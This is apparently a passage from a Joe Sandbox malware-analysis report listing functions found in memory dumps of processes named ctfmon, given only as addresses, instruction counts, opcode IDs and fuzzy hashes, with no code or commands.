                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4fbf91583c5073a090d08103dd8c1ae4df67757e9744321491897852e5c89ce6
                  • Instruction ID: 5ba64ce27712bfc67f39d86b3e57c416dabc3b3fd0e16a9c90fe3f6b3ac8da07
                  • Opcode Fuzzy Hash: 4fbf91583c5073a090d08103dd8c1ae4df67757e9744321491897852e5c89ce6
                  • Instruction Fuzzy Hash: 4811F53190862E8EEB64EB54D894BFDB3B5EB54344F0045BAD40DA7282DB78A994CF44
                  Function 00007FF848F4290D Relevance: .0, Instructions: 47COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 64e7655edf8423dd4aeb20bdac5fef4239a45eb45c2415f6e825fd4d8964a7c1
                  • Instruction ID: 3292cd4813ff54b3bc303eb93bb0882ecdf2522ef43d82be4237a37d00086fad
                  • Opcode Fuzzy Hash: 64e7655edf8423dd4aeb20bdac5fef4239a45eb45c2415f6e825fd4d8964a7c1
                  • Instruction Fuzzy Hash: 6101963180C64E8EE791BBA488886B97AE0FF69740F0508B6D408D60A2EB38E180C704
                  Function 00007FF848F4BE0E Relevance: .0, Instructions: 47COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 16743c0d09b60cb41aa584a5d1dbc85522347d441a0b472759febb11380e4a87
                  • Instruction ID: aefef97b92b1a6910b7580d479b58de6fe8fd8a6352976fdc5c2536853adf832
                  • Opcode Fuzzy Hash: 16743c0d09b60cb41aa584a5d1dbc85522347d441a0b472759febb11380e4a87
                  • Instruction Fuzzy Hash: A511C570D1850ACFEB54EF94D884AED77B2EF68750F20452AE419A72D1DB3868908B44
                  Function 00007FF848F4AAE9 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 47b5f5518ef5606c3e1ed5442d2a52f7ac54c527fb42a7865a66a0498d79d319
                  • Instruction ID: 46a4cc367ab76f70b35fd4e23b2dc7a92d71e33f4dd36992189aa71c2a125193
                  • Opcode Fuzzy Hash: 47b5f5518ef5606c3e1ed5442d2a52f7ac54c527fb42a7865a66a0498d79d319
                  • Instruction Fuzzy Hash: 1C018F3194D6898FE742BB7888591A97FE1EF2A780F0605F3D408C70E2EF28A4888711
                  Function 00007FF848F42FA9 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7c746f4734a4ae3da34cb64d42d20ebb2a80313475be15b1ce778bc3bcde8828
                  • Instruction ID: 52a0bbc1c80ddb05ba0f3fc7b20d1589c5db1f0247f3cc6b6196a96bb2ef4358
                  • Opcode Fuzzy Hash: 7c746f4734a4ae3da34cb64d42d20ebb2a80313475be15b1ce778bc3bcde8828
                  • Instruction Fuzzy Hash: F201BC31A0D68A4FE742BB7888596A97FE0EF29350F4509B3D409DB0E6EB38A4448310
                  Function 00007FF848F40608 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fdf9448772593aa6ebc9ff13224e8453f71d9548666a8c607375ea2513814f8a
                  • Instruction ID: f166000d937f638df1a50460eb349bf699898c747e03d5cec880857de07da961
                  • Opcode Fuzzy Hash: fdf9448772593aa6ebc9ff13224e8453f71d9548666a8c607375ea2513814f8a
                  • Instruction Fuzzy Hash: 0E016930818A0E9EEB58EB6484582BE77A0FF28345F2008BFE40ED21D1DF35A590C604
                  Function 00007FF848F40610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 573c74097b006a1f697aa6bb74e4fc7117bbabace6d24bf15ce4889fb0538a6d
                  • Instruction ID: 8dc82fa8f732052b2f8b51ee4f7b87ad4dd6d3e3c03cb08525fdb963e22413bf
                  • Opcode Fuzzy Hash: 573c74097b006a1f697aa6bb74e4fc7117bbabace6d24bf15ce4889fb0538a6d
                  • Instruction Fuzzy Hash: D0016930819A0E9EEB48EB6484586BDB7A0FF28745F20087FE81ED21D5DF35A594C714
                  Function 00007FF848F41D3D Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 561a4e28e0b0b2d758e8050a05d48bbb978d9f161d638e32a12c0906e90ab363
                  • Instruction ID: 6c1856ba992c7b62aba4137dab13ac778cac819b9e263d3f194f7ff09d1dafb8
                  • Opcode Fuzzy Hash: 561a4e28e0b0b2d758e8050a05d48bbb978d9f161d638e32a12c0906e90ab363
                  • Instruction Fuzzy Hash: FF01D17080DADD8FDB99EF2488552B93BA1EF25700F5000BAD408C61D2DB769494C740
                  Function 00007FF848F4BE7A Relevance: .0, Instructions: 40COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b0b830105a69d29a0109896e084e355c2470d259f03f0d6f640e7d7a31e60dd7
                  • Instruction ID: 3ee74543a1a70ee14509e8819f6087abb29348b806fb8f1cb3ea69af1ac7d29e
                  • Opcode Fuzzy Hash: b0b830105a69d29a0109896e084e355c2470d259f03f0d6f640e7d7a31e60dd7
                  • Instruction Fuzzy Hash: 25019270D1810ACFDB18EF94D890AFDB7B2EF68750F20452AE415B22D2DB3869508B98
                  Function 00007FF848F405D0 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f0df1316ac987f594f21fd5d4046c098c7a4e0de755a43581fd9bd6d5314d304
                  • Instruction ID: 2edcf7bfb5c77e6270e2a7f3a86f47ac096750f828930df30da31da29359b7f2
                  • Opcode Fuzzy Hash: f0df1316ac987f594f21fd5d4046c098c7a4e0de755a43581fd9bd6d5314d304
                  • Instruction Fuzzy Hash: ECF0CD3081DA8E8FEB88FF2494052FA77A0EF25348F10053AE80DD20D1DB3AA490CB84
                  Function 00007FF848F54CE8 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: badfc7fa8be733204c63bb5fbd8e8f67708ec38a6cf0efe3d31a7c6c42d3d21d
                  • Instruction ID: fd7197c950d54e0511a6dce6f23779d4cde9619d2996bc70c5e849b1d4071ac5
                  • Opcode Fuzzy Hash: badfc7fa8be733204c63bb5fbd8e8f67708ec38a6cf0efe3d31a7c6c42d3d21d
                  • Instruction Fuzzy Hash: 5DF02D75D0D58E8EEB95AB3454252B57AD0FF25340F0400FAD40CC30C7EF685454C209
                  Function 00007FF848F42829 Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4abee2a451b4577574ed6e6df94e7fe75eee7ca10e38d41546ac7f67d72afb9c
                  • Instruction ID: 7dc85d45da96c6441e516fb113bbe257af6d9fe9056ad81420a2f7345105eb27
                  • Opcode Fuzzy Hash: 4abee2a451b4577574ed6e6df94e7fe75eee7ca10e38d41546ac7f67d72afb9c
                  • Instruction Fuzzy Hash: DCF0C23080E78E8FD75AAB7088541A93F60FF26641F0504FBD408C61D2DB399444C741
                  Function 00007FF848F51142 Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 028e5bd872817b10512598a2a79e0f7fb0dd4ce2c1ef01f55e5fb1c7051b79e9
                  • Instruction ID: 478ab44ce86a268d35c7a529f48cdf96273058975626a7411be7fcd03677ee60
                  • Opcode Fuzzy Hash: 028e5bd872817b10512598a2a79e0f7fb0dd4ce2c1ef01f55e5fb1c7051b79e9
                  • Instruction Fuzzy Hash: 0DF01431A0862D8FDB54EF94D894AEDB3B1EB54355F0045A6C80DEB281EB34A9948B80
                  Function 00007FF848F4289D Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6035aafa018e25a3231ff189fa72ada0718d2bc9585201684d48176f71812222
                  • Instruction ID: 4695dc9c3dd3e3a8f3d65558cb1396e8a1042d31e763d2ada08115330539b2af
                  • Opcode Fuzzy Hash: 6035aafa018e25a3231ff189fa72ada0718d2bc9585201684d48176f71812222
                  • Instruction Fuzzy Hash: B4F0B43081E78E8FD74AAB7088142BD3BA0FF56605F4105BBE809C50D2EF389558C711
                  Function 00007FF848F40F8E Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a66053a5c3e41005128846900bf752eeae8070dd6c75e6c742312ac3864b276e
                  • Instruction ID: a9c6eff84e055f628fae23fcb3f20d1e9dc269b4a7479e5676b8e6f32bc16fb1
                  • Opcode Fuzzy Hash: a66053a5c3e41005128846900bf752eeae8070dd6c75e6c742312ac3864b276e
                  • Instruction Fuzzy Hash: 73F0123090A5198FEB50EB14C944BEDB7F1EF94345F1041B6C409A32D5DF396E848B98
                  Function 00007FF848F4242D Relevance: .0, Instructions: 22COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 285a491ba775331639f619188253809f4189f7e4fe389479d3fdba62479d0954
                  • Instruction ID: 21673050da8f76cd8e976c6ce4e34737cabd10bd0bca2739f2617382c70638f7
                  • Opcode Fuzzy Hash: 285a491ba775331639f619188253809f4189f7e4fe389479d3fdba62479d0954
                  • Instruction Fuzzy Hash: 23F0AC30908519CFEB94FB00CC54BE973A1FBA4750F5085BAC40EE71A1DE7869888B44
                  Function 00007FF848F4BEAF Relevance: .0, Instructions: 19COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2362fcf7aedc86f85b7f86231e1d89ec003add7762da3abbb441079b0a828311
                  • Instruction ID: 46056cbfda2bd91b967a3c4d27634ac1a3fcdf25fdfcd3a3956133599e87f484
                  • Opcode Fuzzy Hash: 2362fcf7aedc86f85b7f86231e1d89ec003add7762da3abbb441079b0a828311
                  • Instruction Fuzzy Hash: 5CD04235A1892DCFDF50EB98D8815EDB3B4FBA8351F000126D51DE7181DB6468118B40

                  Executed Functions

                  Function 00007FF848F234AC Relevance: 1.7, Strings: 1, Instructions: 473COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID: X_H
                  • API String ID: 0-215283271
                  • Opcode ID: 67bf7b46a6918bb771773fcf088c3ea15de2a1e92d43fafb94a366d96220d913
                  • Instruction ID: 4d923106879ea529398641c37d96a1d0c88fc4234b874e252420d5a718dc6c58
                  • Opcode Fuzzy Hash: 67bf7b46a6918bb771773fcf088c3ea15de2a1e92d43fafb94a366d96220d913
                  • Instruction Fuzzy Hash: 0FF1CFB190DA4E8FEB45EB2898597A9BFE0FF49344F4401BAC009C72E2DB796445CB01
                  Function 00007FF848F29D61 Relevance: 1.2, Instructions: 1207COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6b6637ccc7fe2be7d1c9e337a4854e050e58d97c4056723e4e6469f81c69b9b
                  • Instruction ID: 79e375f1ff493c8f5a98099f43418eebf743bf13c0fec8055c27ccc0d45494f6
                  • Opcode Fuzzy Hash: a6b6637ccc7fe2be7d1c9e337a4854e050e58d97c4056723e4e6469f81c69b9b
                  • Instruction Fuzzy Hash: 57929D3090D6898FDB86EF3898696A97FF0FF1A301F0505EBD449C71A2DB39A985C711
                  Function 00007FF848F2AE3D Relevance: .8, Instructions: 833COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 17d9b1962e38bba281dc4325e71249e24c27b00e601a1e0c8bcd84c788243372
                  • Instruction ID: 2e902a8cb3f3bc55b63f2b2de614209325770dd134df84c070f4fdcadfc528d1
                  • Opcode Fuzzy Hash: 17d9b1962e38bba281dc4325e71249e24c27b00e601a1e0c8bcd84c788243372
                  • Instruction Fuzzy Hash: A342283A90E6869FE741BB28B8551F97BA0FF513A5F0801BBC048CB0D3EF296445C769
                  Function 00007FF848F2AD25 Relevance: .4, Instructions: 384COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 69e802838ad19d577adef0986a43b004e3e2b7730ad26f8cc362b691f03bfb46
                  • Instruction ID: 1189fcc4ba269918f8cad5a26ea9ae4538bea3c1dbb0f174d0a81827ada4de56
                  • Opcode Fuzzy Hash: 69e802838ad19d577adef0986a43b004e3e2b7730ad26f8cc362b691f03bfb46
                  • Instruction Fuzzy Hash: B9D18D3090D68A8FEB95EF2488592FE7BA0FF55341F0405BBE809C71D2DB38A994C795
                  Function 00007FF848F2A87D Relevance: .4, Instructions: 373COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a7a47cc85e172aec34ce9adaf290363c07c862a028f90bc5690c951ca9996463
                  • Instruction ID: 9bed07f58e2bb6caa651794683b7be5caff77d65498b3fc19008a614e03642c2
                  • Opcode Fuzzy Hash: a7a47cc85e172aec34ce9adaf290363c07c862a028f90bc5690c951ca9996463
                  • Instruction Fuzzy Hash: FBC1AE3090D68A8FD746EB2498996F9BBF0FF19341F0545BBD409C70D2EB3AA584CB15
                  Function 00007FF848F2122D Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: 6a8fd7c23e288d7bc4a8e4c56718540c67252144f938f8e814f8b41c9512ea64
                  • Instruction ID: 6a13b55ee8b8f9a0cd2a8ddf29c3b6f988cd2a9e7897f0f4a6356f5eb2b7c6e7
                  • Opcode Fuzzy Hash: 6a8fd7c23e288d7bc4a8e4c56718540c67252144f938f8e814f8b41c9512ea64
                  • Instruction Fuzzy Hash: F051B030D0CA4E8FEB48EBA8D8596F97BE1FF59351F0400BAD00AD71D2DB26A884C755
                  Function 00007FF848F21240 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: eb9a1bf81a4ef3351ff329272696b68cde19ce917da02b50ec93b6ac7f788e3c
                  • Instruction ID: d903adb169122d2bfeedea40fa643c266ad65b99b249114b246819f236bc6478
                  • Opcode Fuzzy Hash: eb9a1bf81a4ef3351ff329272696b68cde19ce917da02b50ec93b6ac7f788e3c
                  • Instruction Fuzzy Hash: 1A31A031D0DA8E8FFB58EBA8E8182FA7BE0FF59351F04007AE409D31D2DB2968548755
                  Function 00007FF848F2C930 Relevance: .5, Instructions: 460COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 10966eeee1892e1011b88914b8dc6975d9e5ef2e2e970d6aecbd2bd0f516ff03
                  • Instruction ID: b22fee9b3fa564995ae088e6d743d5dc53e3a84cc4b27c022b2139917fd7ddfc
                  • Opcode Fuzzy Hash: 10966eeee1892e1011b88914b8dc6975d9e5ef2e2e970d6aecbd2bd0f516ff03
                  • Instruction Fuzzy Hash: 5761AC3080DA8D8FEB86EB3488696B97BA0FF1A341F5504BBD409C71E2EF39A544C751
                  Function 00007FF848F22D53 Relevance: .4, Instructions: 386COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0a5edf93d7c46e880bf674be75d427fb356fc68a59b030117c1c39c2722bd082
                  • Instruction ID: f483a9d2425ca337d55eb8fdb41e269ffef97441b47ce2ec6db04b136db3c9b7
                  • Opcode Fuzzy Hash: 0a5edf93d7c46e880bf674be75d427fb356fc68a59b030117c1c39c2722bd082
                  • Instruction Fuzzy Hash: 6DD1AD30D0D68A8FEB41FBB898596B9BBE0FF1A351F0409B6D408C71E2EB39A544C715
                  Function 00007FF848F23138 Relevance: .3, Instructions: 324COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2c77968d014427db281900008d0ab84d45b9bfeefc78afc4fda8da48ce79b586
                  • Instruction ID: cd16b9c1ddcbce957080b7f84777a0b7a9b62a5ba088a2a37e7b9df1916e5088
                  • Opcode Fuzzy Hash: 2c77968d014427db281900008d0ab84d45b9bfeefc78afc4fda8da48ce79b586
                  • Instruction Fuzzy Hash: 8CB18770D0D6498FEB51EBA8D8986E9BBF0FF59341F0401BAD009D71E2DB39A944CB16
                  Function 00007FF848F21C75 Relevance: .3, Instructions: 310COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4e20ec4be11caa055a9f5ba5c5a4a15a6969ec27d9930ba93f120bcb23fc8ae3
                  • Instruction ID: abab32e4574a72ed9e2ae3ccea940656c0b9540a1f125a49608ff6bca2c70f4c
                  • Opcode Fuzzy Hash: 4e20ec4be11caa055a9f5ba5c5a4a15a6969ec27d9930ba93f120bcb23fc8ae3
                  • Instruction Fuzzy Hash: A691F331A0CA8A8FDB59EF6898551BA7BE1FF99340F1405BED449C32C2DF35A842C749
                  Function 00007FF848F20A01 Relevance: .3, Instructions: 303COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f5319ef93f507d1b84457bfd25f59ff95b21ec2dbd7815ad54c7616aa342208d
                  • Instruction ID: 344c443b49d7a522ec3ee15b97490d3971b653d8cf2784f10caf6be29e631925
                  • Opcode Fuzzy Hash: f5319ef93f507d1b84457bfd25f59ff95b21ec2dbd7815ad54c7616aa342208d
                  • Instruction Fuzzy Hash: 5BA1DE72D0D68A8FE795FB7498592B9BBE0FF94340F4445BAD808D70E2EF39A5448B04
                  Function 00007FF848F205F0 Relevance: .3, Instructions: 277COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f399bfd2b38e5dd7cbb68d3483f0ea0d92abbceb77e42b861b815c6ddea2879c
                  • Instruction ID: 052b4189961f497d9508433dfabff8df250b2ecef802fab70329245c7126f418
                  • Opcode Fuzzy Hash: f399bfd2b38e5dd7cbb68d3483f0ea0d92abbceb77e42b861b815c6ddea2879c
                  • Instruction Fuzzy Hash: A581B130A0CA4A8FDB48EF6898556BA77E1FF98350F10457ED40AC32D1DF35A842C789
                  Function 00007FF848F22248 Relevance: .3, Instructions: 270COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b4fe41a24ce7d94a9fca498b6a8e712be2056bba709b4cef24cc10b2e10e63bf
                  • Instruction ID: cd7250fdcf0ff2cad4c43f136b52b1dcdf8661cfb1d52b9f781f37ce5c617fc1
                  • Opcode Fuzzy Hash: b4fe41a24ce7d94a9fca498b6a8e712be2056bba709b4cef24cc10b2e10e63bf
                  • Instruction Fuzzy Hash: 53A1CD31C0D65A8FEBA8EB6498557F8B7A0FF45340F1045BAC00D971D2DF3A6984CB48
                  Function 00007FF848F21738 Relevance: .3, Instructions: 263COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8e56e65958bab2e6792c38f8322d083ce046298311819ef42fe5fb7671a0d2c4
                  • Instruction ID: 8f5112c8d44fca7f7ebc3f755a1e7b48fb766ba5d9d57fc89e349e6406872e18
                  • Opcode Fuzzy Hash: 8e56e65958bab2e6792c38f8322d083ce046298311819ef42fe5fb7671a0d2c4
                  • Instruction Fuzzy Hash: 2B71AE31A0CA4A8FDB48EF5898516B9B7E2FF98750F14057AD45DC32C6CF35A842C789
                  Function 00007FF848F2AD5D Relevance: .2, Instructions: 241COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 79f544b2d84474bc9f8c1fbefb1e87a80cc6efbb63b74c26e44356af1b14278e
                  • Instruction ID: bc14b93efe2c43314670c36a49badd1191409a64442791fc99f294b0dc27901b
                  • Opcode Fuzzy Hash: 79f544b2d84474bc9f8c1fbefb1e87a80cc6efbb63b74c26e44356af1b14278e
                  • Instruction Fuzzy Hash: 5281573091D68E8FEB95EF2488592FA7BF0FF59341F0405BBD809D61A2EB38A584C745
